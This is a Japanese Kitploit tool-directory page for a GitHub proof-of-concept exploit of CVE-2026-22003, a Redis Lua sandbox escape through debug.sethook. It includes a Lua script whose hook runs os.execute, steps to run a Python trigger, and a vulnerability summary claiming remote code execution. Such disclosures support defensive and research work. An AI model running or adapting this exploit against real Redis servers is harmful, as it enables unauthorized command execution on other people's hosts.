Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-22003-Redis-Lua-Sandbox-Escape-via-debug.sethook- — CVE-2026-22003 の概念実証エクスプロイト。debug.sethook を介した Redis Lua サンドボックスエスケープにより、任意のシステムコマンドを実行することを実証します。 | Kitploit
ツール/GitHubGitHub/george0papasotiriou/cve-2026-22003-redis-lua-sandbox-escape-via-debug.sethook-
特権昇格脆弱性分析エクスプロイトデータベースセキュリティ敵対的攻撃
GitHubgeorge0papasotiriou/cve-2026-22003-redis-lua-sandbox-escape-via-debug.sethook-

CVE-2026-22003-Redis-Lua-Sandbox-Escape-via-debug.sethook-

CVE-2026-22003 の概念実証エクスプロイト。debug.sethook を介した Redis Lua サンドボックスエスケープにより、任意のシステムコマンドを実行することを実証します。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
16日前未レビュー

CVE-2026-22003 – debug.sethook による Redis Lua サンドボックスエスケープ

プログラムコード(Lua + Python トリガー)

root@kitploit:~
-- redis_sandbox.lua - Script that attempts sandbox escape
local function escape()
  debug.sethook(function() 
    -- This hook runs in a privileged context
    os.execute("id > /tmp/redis_escape") 
  end, "r")
  local a = 1
end
return escape()

CVE-2026-22003 – debug.sethook による Redis Lua サンドボックスエスケープ

Severity: Critical

概要

Redis Lua サンドボックスは debug.sethook 関数を適切に無効化していません。Lua スクリプトを実行できる攻撃者は、特権コンテキストで実行されるフックを仕掛け、サンドボックスを抜け出して任意のシステムコマンドを実行することができます。

脆弱性の詳細

  • タイプ: サンドボックスエスケープ
  • 影響: Redis ホスト上でのリモートコード実行。
  • 根本原因: Lua 環境のデバッグライブラリがアクセス可能なまま残っており、os.execute や類似の関数を呼び出すフックが許可されています。

エクスプロイトの実演

  1. Redis サーバーを起動します(EVAL を許可するデフォルト設定を使用)。
  2. エクスプロイトを実行します:
    root@kitploit:~
    pip install redis
    python trigger_redis_sandbox_escape.py
    

/tmp/redis_escape ファイルが作成され、コマンド実行が証明されます。

ツールをダウンロード